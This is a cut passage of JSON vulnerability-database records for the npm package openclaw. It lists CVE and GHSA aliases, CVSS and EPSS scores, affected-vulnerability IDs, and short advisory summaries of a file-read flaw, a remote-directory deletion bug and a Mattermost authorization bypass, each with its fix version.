                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41363"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qf48-qfv4-jjm9",
                    "reference_id": "GHSA-qf48-qfv4-jjm9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qf48-qfv4-jjm9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41363",
                "GHSA-qf48-qfv4-jjm9"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qjvc-etb4-qbfv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89402?format=api",
            "vulnerability_id": "VCID-r5bw-c2py-9udf",
            "summary": "OpenClaw: OpenShell mirror mode could delete arbitrary remote directories when roots were mis-scoped\n## Summary\n\nBefore OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations.\n\n## Impact\n\nIf an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory and replace them with uploaded workspace data. This was a destructive remote-path bug in the mirror-sync path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `b21c9840c2e38f4bb338d031511b479d5f07ca25` — constrain OpenShell mirror sync roots\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @jufeng123768 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41383",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1855",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18515",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18553",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41383"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41383",
                    "reference_id": "CVE-2026-41383",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41383"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m34q-h93w-vg5x",
                    "reference_id": "GHSA-m34q-h93w-vg5x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m34q-h93w-vg5x"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths",
                    "reference_id": "openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41383",
                "GHSA-m34q-h93w-vg5x"
            ],
            "risk_score": 3.6,
            "exploitability": "0.5",
            "weighted_severity": "7.3",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r5bw-c2py-9udf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91808?format=api",
            "vulnerability_id": "VCID-r9j7-ya3h-cbda",
            "summary": "OpenClaw: Mattermost callback dispatch allowed non-allowlisted sender actions\n## Summary\nMattermost interactive callback dispatch could run action handlers before normal sender authorization checks completed.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/mattermost/src/mattermost/interactions.ts now requires callback authorization before dispatching actions.\n- extensions/mattermost/src/mattermost/monitor.ts routes callback authorization through the same sender and allowlist policy used for normal ingress.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35652",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19797",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19749",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19792",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35652"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66",
                    "reference_id": "",
